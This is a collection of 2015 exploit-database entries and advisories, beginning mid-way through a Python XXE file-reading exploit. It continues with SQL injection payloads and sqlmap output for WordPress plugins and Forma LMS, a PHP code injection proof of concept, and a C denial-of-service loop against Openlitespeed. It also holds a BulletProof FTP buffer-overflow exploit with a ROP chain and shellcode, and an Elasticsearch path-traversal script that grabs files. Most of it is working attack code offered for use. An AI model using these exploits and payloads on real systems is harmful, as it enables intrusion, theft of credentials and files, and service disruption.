'exit']: print '\n\033[36mno such command, use help for command list \033[0m\n' continue if cmd == 'exit': break if cmd == 'help': print '\033[36m' + help_interpreter + '\033[0m' continue if cmd == 'show': print '\n\033[36m' + buffer_with_loot + '\033[0m' continue if cmd == 'store': with open(arg,'w') as outf: outf.write(buffer_with_loot) print '\n\033[32mbuffer content has been stored in file ' + arg + '\033[0m\n' continue if cmd == 'get': if arg.startswith('.'): arg = '/proc/self/cwd' + arg[1:] arg = 'file://' + arg rand_attr = ''.join([random.choice(string.ascii_lowercase) for i in range(10)]) ### random attribute name where we place content if technique == 'inb1': request1 = requests['inb1']['PROPPATCH'] % {'attr_name' : rand_attr, 'file' : arg} request(url, 'PROPPATCH', request1, creds, timeout = 30) request2 = requests['inb1']['PROPFIND'] loot = request(url, 'PROPFIND', request2, creds, timeout = 30) try: buffer_with_loot = ET.fromstring(loot).findall('.//' + rand_attr)[0].text except: buffer_with_loot = '' if technique == 'inb2': request1 = requests['inb2']['PROPPATCH'] % {'attr_name' : rand_attr, 'file' : arg, 'ip' : ip, 'port' : hport} request(url, 'PROPPATCH', request1, creds, timeout = 30) request2 = requests['inb2']['PROPFIND'] loot = request(url, 'PROPFIND', request2, creds, timeout = 30) try: buffer_with_loot = ET.fromstring(loot).findall('.//' + rand_attr)[0].text.replace('<[CDATA[','').replace(']]>','') except: buffer_with_loot = '' if technique == 'oob': request1 = requests['oob']['PROPFIND'] % {'file' : arg, 'ip' : ip, 'port' : hport} request(url, 'PROPFIND', request1, creds, timeout = 8) buffer_with_loot = ftp_server.get_loot() ftp_server.clean_buf() len_ = sys.getsizeof(buffer_with_loot) - sys.getsizeof('') print "\n\033[32mloaded %s bytes in buffer\033[0m\n" % len_ if not len_: print '\033[36m' + failure_descr + '\033[0m' continue def parse_options(): global url, tech, ip, creds, hport, fport parser = OptionParser(usage = usage) parser.add_option('--url', dest = url, help = 'url parameter') parser.add_option('--tech', dest = tech, help = 'technique, valid values are: inb1, inb2, oob') parser.add_option('--creds', dest = creds, help = 'user credentials, default value is anonymous:anonymous') parser.add_option('--ip', dest = ip, help = 'ip address of netw interface that your target is able to access') parser.add_option('--hport', dest = hport, help = 'port for HTTP server which will be launched during attack, default is 9998') parser.add_option('--fport', dest = fport, help = 'port for FTP server which will be launched during attack, default is 9999') (options, args) = parser.parse_args() if not options.url or not options.tech: print 'you must specify url and tech parameters' sys.exit(2) if options.tech not in ['inb1', 'inb2', 'oob']: print 'invalid tech parameter' sys.exit(2) if options.tech != 'inb1' and not options.ip: print 'you must specify ip parameter' sys.exit(2) url = options.url tech = options.tech ip = options.ip creds = options.creds if options.creds else 'anonymous:anonymous' hport = options.hport if options.hport else 9998 fport = options.fport if options.fport else 9999 parse_options() if tech != 'inb1': http_server = HTTP_XXE(ip, hport, fport) http_server.run() if tech == 'oob': ftp_server = FTP_XXE(fport) ftp_server.run() exploit(url, tech, creds) if tech != 'inb1': http_server.stop() if tech == 'oob': ftp_server.stop()

# Title: SQLi vulnerabilities in WordPress plugin "GigPress" # Author: Adrián M. F. - adrimf85[at]gmail[dot]com # Date: 2015-05-25 # Vendor Homepage: https://wordpress.org/plugins/gigpress/ # Active installs: 20,000+ # Vulnerable version: 2.3.8 # Fixed version: 2.3.9 # CVE: CVE-2015-4066 Vulnerabilities (2) ===================== (1) Authenticated SQLi [CWE-89] ------------------------------- * CODE: admin/handlers.php:87 +++++++++++++++++++++++++++++++++++++++++ $show['show_tour_id'] = $_POST['show_tour_id']; +++++++++++++++++++++++++++++++++++++++++ admin/handlers.php:94 +++++++++++++++++++++++++++++++++++++++++ $artist = $wpdb->get_var("SELECT artist_name FROM " . GIGPRESS_ARTISTS . " WHERE artist_id = " . $show['show_artist_id'] . ""); +++++++++++++++++++++++++++++++++++++++++ * POC: http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php POST DATA: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1[SQLi]&show_venue_id=1&show_related=new SQLMap +++++++++++++++++++++++++++++++++++++++++ ./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_artist_id --dbms mysql [............] POST parameter 'show_artist_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 72 HTTP(s) requests: --- Parameter: show_artist_id (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT 9266 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(9266=9266,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_venue_id=1&show_related=new Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BiUm)&show_venue_id=1&show_related=new --- [12:21:09] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 7.0 (wheezy) web application technology: Apache 2.2.22, PHP 5.4.39 back-end DBMS: MySQL 5.0 +++++++++++++++++++++++++++++++++++++++++ (2) Authenticated SQLi [CWE-89] ------------------------------- * CODE: admin/handlers.php:71 +++++++++++++++++++++++++++++++++++++++++ $show['show_venue_id'] = $_POST['show_venue_id']; +++++++++++++++++++++++++++++++++++++++++ admin/handlers.php:95 +++++++++++++++++++++++++++++++++++++++++ $venue = $wpdb->get_results("SELECT venue_name, venue_city FROM " . GIGPRESS_VENUES . " WHERE venue_id = " . $show['show_venue_id'] . "", ARRAY_A); +++++++++++++++++++++++++++++++++++++++++ * POC: http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php POST DATA: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1[SQLi]&show_related=new SQLMap +++++++++++++++++++++++++++++++++++++++++ ./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_venue_id --dbms mysql [............] POST parameter 'show_venue_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 72 HTTP(s) requests: --- Parameter: show_venue_id (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(6543=6543,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_related=new Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))OzkE)&show_related=new --- [12:23:57] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 7.0 (wheezy) web application technology: Apache 2.2.22, PHP 5.4.39 back-end DBMS: MySQL 5.0 +++++++++++++++++++++++++++++++++++++++++ Timeline ======== 2015-05-09: Discovered vulnerability. 2015-05-20: Vendor notification. 2015-05-20: Vendor response and fix. 2015-05-25: Public disclosure.

# Exploit Title: Wordpress MailChimp Subscribe Forms Remote Code Execution # Date: 21-04-2015 # Exploit Author: woodspeed # Vendor Homepage: https://wordpress.org/plugins/mailchimp-subscribe-sm/ # Software Link: https://downloads.wordpress.org/plugin/mailchimp-subscribe-sm.1.1.zip # Version: 1.1 # Tested on: Apache 2.2.22, PHP 5.3.10 # OSVDB ID : http://www.osvdb.org/show/osvdb/121081 # WPVULNDB ID : https://wpvulndb.com/vulnerabilities/7935 # Category: webapps 1. Description Remote Code Execution via email field. 2. Proof of Concept POST Request sm_email=<?php echo 'Current PHP version: '. phpversion();?>&submit= When the admin user checks the subscibers list, the php code is executed. 3. Solution Fixed in version 1.2

/* * Openlitespeed 1.3.9 Use After Free denial of service exploit. * * This exploit triggers a denial of service condition within the Openlitespeed web * server. This is achieved by sending a tampered request contain a large number (91) * of 'a: a' header rows. By looping this request, a memmove call within the HttpReq * class is triggered with a freed pointer, resulting in a reference to an invalid * memory location and thus a segmentation fault. * * UAF Request: * GET / HTTP/1.0 * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * a: a * * The above request should be placed into a file name 'uafcrash' prior to running this * exploit code. * * Date: 24/03/2015 * Author: Denis Andzakovic - Security-Assessment.com * */ #include <stdio.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <arpa/inet.h> #include <errno.h> extern int errno; int main(int argc, char ** argv){ FILE * fp; size_t len = 0; char * line; if((fp = fopen("uafcrash", "r")) == NULL){ fprintf(stderr, "[!] Error: Could not open file uafcrash: %s", strerror(errno)); return 1; } char * host = "127.0.0.1"; int port = 8088; int count = 0; int sock; struct sockaddr_in serv_addr; while(1){ if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0){ fprintf(stderr, "[!] Error: Could not create socket \n"); return 1; } serv_addr.sin_family = AF_INET; serv_addr.sin_port = htons(port); inet_pton(AF_INET, host, &serv_addr.sin_addr); if(connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr))<0){ fprintf(stderr, "[!] Error: Could not connect! Check for server crash! Total cases sent:%d\n", count); close(sock); return 1; } while ((getline(&line, &len, fp)) != -1){ write(sock, line, strlen(line)); } close(sock); rewind(fp); count++; } return 42; }

# Exploit Title: Chronosite 5.12 SQL Injection # Google Dork: filetype:php inurl:"/archives.php" intext:"ARCHIVES Chrono-site" # Date: 13/05/15 # Exploit Author: Wad Deek # Vendor Homepage: http://www.chronosite.org/ # Software Link: http://www.chronosite.org/chrono_upload/chronosite_512.zip # Version: 5.12 # Tested on: Xampp on Windows7 ################################################################ PoC = http://127.0.0.1/cms/chronosite_512/archives.php?numero=%27 ################################################################

// Source: https://marc.info/?l=oss-security&m=143155206320935&w=2 #include <sys/io.h> #define FIFO 0x3f5 int main() { int i; iopl(3); outb(0x0a,0x3f5); /* READ ID */ for (i=0;i<10000000;i++) outb(0x42,0x3f5); /* push */ }

// Source: http://www.binvul.com/viewthread.php?tid=508 // Source: https://twitter.com/NTarakanov/status/598370525132423168 #include <windows.h> #include <winternl.h> #include <stdio.h> #pragma comment(lib, "ntdll.lib") int main(int argc, CHAR* argv[]) { typedef NTSTATUS (__stdcall *NT_OPEN_FILE)(OUT PHANDLE FileHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG ShareAccess, IN ULONG OpenOptions); NT_OPEN_FILE NtOpenFileStruct; PVOID Info; HMODULE hModule = LoadLibrary(("ntdll.dll")); NtOpenFileStruct = (NT_OPEN_FILE)GetProcAddress(hModule, "NtOpenFile"); if(NtOpenFileStruct == NULL) { exit(-1); } UNICODE_STRING filename; RtlInitUnicodeString(&filename, L"\\Device\\CNG"); OBJECT_ATTRIBUTES obja; obja.Attributes = 0x40; obja.ObjectName = &filename; obja.Length = 0x18; obja.RootDirectory = NULL; obja.SecurityDescriptor = NULL; obja.SecurityQualityOfService = NULL; IO_STATUS_BLOCK iostatusblock; HANDLE hCNG = NULL; NTSTATUS stat = NtOpenFileStruct(&hCNG, 0x100001, &obja, &iostatusblock, 7, 0x20); if(NT_SUCCESS(stat)) { printf("File successfully opened.\n"); } else { printf("File could not be opened.\n"); return -1; } DWORD dwBuffer = 0; DWORD dwCnt = 0; BOOL bRet = DeviceIoControl((HANDLE)hCNG, 0x390048, &dwBuffer, 4, &dwBuffer, 4, &dwCnt, NULL); if (FALSE == bRet) { printf("[*]Send IOCTL fail!\n"); printf("[*]Error Code:%d\n", GetLastError()); } else { printf("[*]0x%08x\n", dwBuffer); } CloseHandle(hCNG); getchar(); return 0; }

#-----------------------------------------------------------------------------# # Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) # # Date: Feb 15 2015 # # Exploit Author: Gabor Seljan # # Software Link: http://www.bpftp.com/ # # Version: 2010.75.0.76 # # Tested on: Windows XP SP3 English # # Credits: His0k4 # # CVE: CVE-2008-5753 # #-----------------------------------------------------------------------------# #!/usr/bin/python from struct import pack # offset to SEH is 93 byte buf = b'A' * 13 buf += pack('<L',0x77c1f62f) # POP ECX # POP ECX # POP EDI # POP EBX # POP EBP # RETN [msvcrt.dll] buf += b'A' * 20 buf += pack('<L',0x74c86a99) # POP ESI # RETN [oleacc.dll] buf += b'A' * 4 buf += pack('<L',0x77c4dca8) # ADD ESP,2C # RETN [msvcrt.dll] buf += b'A' * 18 buf += pack('<L',0x77c1c47f) # POP EBX # POP EBP # RETN 10 [msvcrt.dll] buf += b'A' * 8 buf += pack('<L',0x74c86a9a) # RETN [oleacc.dll] buf += b'A' * 10 buf += b'\xce\xc3\x40' # ADD ESP,400 # POP ESI # POP EBX # RETN [bpftpclient.exe] # ROP chain rop_gadgets = b'' rop_gadgets += pack('<L',0x77c364d5) # POP EBP # RETN [msvcrt.dll] rop_gadgets += pack('<L',0x77c364d5) # skip 4 bytes [msvcrt.dll] rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll] rop_gadgets += pack('<L',0xfffffafe) # Value to negate, will become 0x00000501 rop_gadgets += pack('<L',0x7ca82222) # NEG EAX # RETN [shell32.dll] rop_gadgets += pack('<L',0x77227494) # XCHG EAX,EBX # RETN [WININET.dll] rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll] rop_gadgets += pack('<L',0xffffffc0) # Value to negate, will become 0x00000040 rop_gadgets += pack('<L',0x771bcbe4) # NEG EAX # RETN [WININET.dll] rop_gadgets += pack('<L',0x77f124c8) # XCHG EAX,EDX # RETN [GDI32.dll] rop_gadgets += pack('<L',0x77c2c343) # POP ECX # RETN [msvcrt.dll] rop_gadgets += pack('<L',0x77c605b5) # &Writable location [msvcrt.dll] rop_gadgets += pack('<L',0x77c23b47) # POP EDI # RETN [msvcrt.dll] rop_gadgets += pack('<L',0x77c39f92) # RETN (ROP NOP) [msvcrt.dll] rop_gadgets += pack('<L',0x77c34d9a) # POP ESI # RETN [msvcrt.dll] rop_gadgets += pack('<L',0x77c2aacc) # JMP [EAX] [msvcrt.dll] rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll] rop_gadgets += pack('<L',0x77c11120) # ptr to &VirtualProtect() [IAT msvcrt.dll] rop_gadgets += pack('<L',0x77c12df9) # PUSHAD # RETN [msvcrt.dll] rop_gadgets += pack('<L',0x77c35524) # ptr to 'push esp # ret ' [msvcrt.dll] # heap-only egghunter hunter = b'\x6a\x30\x5a' # PUSH 30 # POP EDX hunter += b'\x64\x8b\x12' # MOV EDX, DWORD PTR FS:[EDX] hunter += b'\x80\xc2\x90' # ADD DL,90 hunter += b'\x8b\x12' # MOV EDX, DWORD PTR [EDX] hunter += b'\x8b\x12' # MOV EDX, DWORD PTR [EDX] hunter += b'\xeb\x05' # JMP SHORT hunter += b'\x66\x81\xca\xff\x0f' # OR DX,0FFF hunter += b'\x42\x52' # INC EDX # PUSH EDX hunter += b'\x6a\x02\x58' # PUSH 2 # POP EAX hunter += b'\xcd\x2e' # INT 2E hunter += b'\x3c\x05' # CMP AL,5 hunter += b'\x5a' # POP EDX hunter += b'\x74\xef' # JE SHORT hunter += b'\xb8\x77\x30\x30\x74' # MOV EAX, w00t hunter += b'\x89\xd7' # MOV EDI,EDX hunter += b'\xaf' # SCAS DWORD PTR ES:[EDI] hunter += b'\x75\xea' # JNZ SHORT hunter += b'\xaf' # SCAS DWORD PTR ES:[EDI] hunter += b'\x75\xe7' # JNZ SHORT # copy shellcode back to stack strcpy = b'\x8b\xec' # MOV EBP,ESP strcpy += b'\x57\x55\x55' # PUSH EDI # PUSH EBP # PUSH EBP strcpy += b'\x68\x30\x60\xc4\x77' # PUSH ptr to &strcpy [msvcrt.dll] strcpy += b'\xc3' # RET egg = 'w00t'.encode() # msfvenom -p windows/exec -b '\x00\x0d\x0a\x1a' -e x86/shikata_ga_nai cmd=calc.exe shellcode = b'' shellcode += b'\xdb\xd1\xb8\xda\x92\x2c\xca\xd9\x74\x24\xf4\x5a\x31' shellcode += b'\xc9\xb1\x31\x83\xc2\x04\x31\x42\x14\x03\x42\xce\x70' shellcode += b'\xd9\x36\x06\xf6\x22\xc7\xd6\x97\xab\x22\xe7\x97\xc8' shellcode += b'\x27\x57\x28\x9a\x6a\x5b\xc3\xce\x9e\xe8\xa1\xc6\x91' shellcode += b'\x59\x0f\x31\x9f\x5a\x3c\x01\xbe\xd8\x3f\x56\x60\xe1' shellcode += b'\x8f\xab\x61\x26\xed\x46\x33\xff\x79\xf4\xa4\x74\x37' shellcode += b'\xc5\x4f\xc6\xd9\x4d\xb3\x9e\xd8\x7c\x62\x95\x82\x5e' shellcode += b'\x84\x7a\xbf\xd6\x9e\x9f\xfa\xa1\x15\x6b\x70\x30\xfc' shellcode += b'\xa2\x79\x9f\xc1\x0b\x88\xe1\x06\xab\x73\x94\x7e\xc8' shellcode += b'\x0e\xaf\x44\xb3\xd4\x3a\x5f\x13\x9e\x9d\xbb\xa2\x73' shellcode += b'\x7b\x4f\xa8\x38\x0f\x17\xac\xbf\xdc\x23\xc8\x34\xe3' shellcode += b'\xe3\x59\x0e\xc0\x27\x02\xd4\x69\x71\xee\xbb\x96\x61' shellcode += b'\x51\x63\x33\xe9\x7f\x70\x4e\xb0\x15\x87\xdc\xce\x5b' shellcode += b'\x87\xde\xd0\xcb\xe0\xef\x5b\x84\x77\xf0\x89\xe1\x88' shellcode += b'\xba\x90\x43\x01\x63\x41\xd6\x4c\x94\xbf\x14\x69\x17' shellcode += b'\x4a\xe4\x8e\x07\x3f\xe1\xcb\x8f\xd3\x9b\x44\x7a\xd4' shellcode += b'\x08\x64\xaf\xb7\xcf\xf6\x33\x16\x6a\x7f\xd1\x66' identifier = b'This is a BulletProof FTP Client Session-File and should not be modified directly.' host = buf port = b'21' name = b'B' + rop_gadgets + hunter + strcpy password = b'bpfmcidchffddknejf' local = egg + egg + shellcode sploit = b"\r\n".join([identifier, host, port, name, password, local]) try: print('[*] Creating exploit file...') f = open('sploit.bps', 'wb') f.write(sploit) f.close() print('[*] sploit.bps file successfully created!') except: print('[!] Error while creating exploit file!')

Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities [+] Author: Filippo Roncari [+] Target: Forma LMS [+] Version: 1.3 and probably lower [+] Vendor: http://www.formalms.org [+] Accessibility: Remote [+] Severity: High [+] CVE: <requested> [+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf [+] Info: f.roncari@securenetwork.it / f@unsec.it [+] Summary Forma LMS is a corporate oriented Learning Management System, used to manage and deliver online training courses. Forma LMS is SCORM compliant with enterprise class features like multi-client architecture, custom report generation, native ecommerce and catalogue management, integration API, and more. [+] Vulnerability Details Forma LMS 1.3 is prone to multiple PHP Object Injection vulnerabilities, due to a repeated unsafe use of the unserialize() function, which allows unprivileged users to inject arbitrary PHP objects. A potential attacker could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input, in order to execute code on the remote server or abuse arbitrary functionalities. [+] Technical Details See full advisory at https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf for the list of identified OI flaws and further technical details. [+] Proof of Concept (PoC) The following PoC shows how to abuse the unsafe unserialize() called in writemessage() function in order to trigger a SQL injection flaw. This is an alternative way to exploit one of the identified OI, since a quick check did not highlight useful magic methods. The PoC as well as the other identified vulnerabilities are further detailed in the full advisory. [!] PoC Payload ---------------------------- a:2:{i:0;s:122:"0) union select if(substring(pass,1,1) = char(53),benchmark(5000000,encode(1,2)),null) from core_user where idst=11836-- ";i:1;s:1:"1";} ---------------------------- [!] PoC Request ---------------------------- POST /formalms/appLms/index.php?modname=message&op=writemessage HTTP/1.1 Host: localhost Cookie: docebo_session=91853e7eca413578de70304f94a43fe1 Content-Type: multipart/form-data; boundary=---------------------------1657367614367103261183989796 Content-Length: 1453 [...] -----------------------------1657367614367103261183989796 Content-Disposition: form-data; name="message[recipients]" a%3A2%3A%7Bi%3A0%3Bs%3A122%3A%220%29+union+SELECT+IF%28SUBSTRING%28pass%2C1%2C1%29+%3D+ char%2853%29%2Cbenchmark%285000000%2Cencode%281%2C2%29%29%2Cnull%29+from+core_user+where+idst% 3D11836--++%22%3Bi%3A1%3Bs%3A1%3A%221%22%3B%7D [...] -------------------------- [+] Disclaimer Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.

#!/usr/bin/python # Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign # Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5 # Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net # Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/ # # Source: https://github.com/pandujar/elasticpwn/ import socket, sys print "!dSR ElasticPwn - for CVE-2015-3337\n" if len(sys.argv) <> 3: print "Ex: %s www.example.com /etc/passwd" % sys.argv[0] sys.exit() port = 9200 # Default ES http port host = sys.argv[1] fpath = sys.argv[2] def grab(plugin): socket.setdefaulttimeout(3) s = socket.socket() s.connect((host,port)) s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n" "Host: %s\n\n" % (plugin, fpath, host)) file = s.recv(2048) print " [*] Trying to retrieve %s:" % fpath if ("HTTP/1.0 200 OK" in file): print "\n%s" % file else: print "[-] File Not Found, No Access Rights or System Not Vulnerable" def pfind(plugin): try: socket.setdefaulttimeout(3) s = socket.socket() s.connect((host,port)) s.send("GET /_plugin/%s/ HTTP/1.0\n" "Host: %s\n\n" % (plugin, host)) file = s.recv(16) print "[*] Trying to find plugin %s:" % plugin if ("HTTP/1.0 200 OK" in file): print "[+] Plugin found!" grab(plugin) sys.exit() else: print "[-] Not Found " except Exception, e: print "[-] Error connecting to %s: %s" % (host, e) sys.exit() # Include more plugin names to check if they are installed pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head'] for plugin in pluginList: pfind(plugin)

Document Title: =============== Wireless Photo Transfer v3.0 iOS - File Include Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1492 Release Date: ============= 2015-05-12 Vulnerability Laboratory ID (VL-ID): ==================================== 1492 Common Vulnerability Scoring System: ==================================== 6.5 Product & Service Introduction: =============================== Transfer your photo without usb. The best wireless photo transfer app on the App Store. (Copy of the Vendor Homepage: https://itunes.apple.com/us/app/wireless-photo-transfer/id900376882 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the official wireless photo transfer mobile v3.0 iOS application. Vulnerability Disclosure Timeline: ================================== 2015-05-12: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Yan Xing Product: Wireless Photo Transfer - iOS Mobile Web Application 3.0 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A local file include web vulnerability has been discovered in the official wireless photo transfer mobile v3.0 iOS application. The file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application. The web vulnerability is located in the `album-title` value of the `file upload` module. Remote attackers are able to inject own files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker is able to inject the lfi payload by usage of the wifi interface or local file sync function. Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST. The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise. Request Method(s): [+] [POST] Vulnerable Module(s): [+] Submit (Upload) Vulnerable Parameter(s): [+] filename (album-title) Affected Module(s): [+] Index File Dir Listing (http://localhost:80/) Proof of Concept (PoC): ======================= The local file include web vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: #1 Index File Dir Listing (album-title) <div class="album-folder"> <div class="album-number">2 items</div> <div class="album-title">../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]<a></a></div><a> </a><a href="/group/2/0/100"><img class="album-overlay" alt="" src="/cvab-overlay.png" height="160" width="140"> <img class="album-thumb" alt="" src="/api/group/poster/2" height="90" width="90"></a> <div class="album-folder-img"><img alt="" src="/cvab.png" height="160" width="140"></div> </div> PoC: #2 Topic Album (Album Title - album_info_intro_driver) <div class="top-section"> <div id="intro"> <div class="divider"> <h1 class="strong" id="album_info_intro_driver">../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]<a>(0-2)</a></h1><a> <div class="pagination"></div> </a></div><a> </a></div><a> </a><div class="centered"><a> </a><a class="button-2 ui-glossy rad-l" href="javascript:location.reload(true)">Refresh</a> <a class="button-2 ui-glossy rad-r" href="javascript:downloadAllSelection()">Download ZIP</a> </div> </div> --- PoC Session Logs [POST] --- Status: 200[OK] POST http://localhost:80/upload.html Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:80] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:80/groups] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------8397114799830 Content-Disposition: form-data; name="upload1"; filename="../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]pentesting.png" Content-Type: image/png - Status: 200[OK] GET http://localhost:80/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[210] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:80] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Connection[keep-alive] Response Header: Accept-Ranges[bytes] Content-Length[210] Connection[keep-alive] Date[Sat, 09 May 2015 15:21:30 GMT] Reference(s): http://localhost:80/groups http://localhost:80/upload.html Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable album-title value. Encode also the local app input field for sync. Restrict the filename input and disallow special chars to prevent further arbitrary file upload attacks. Filter and encode also the vulnerable output values in the mobile wifi interface (file dir) application. Security Risk: ============== The security risk of the local file include web vulnerability in the wifi network interface album-title value is estimated as high. (CVSS 6.5) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: 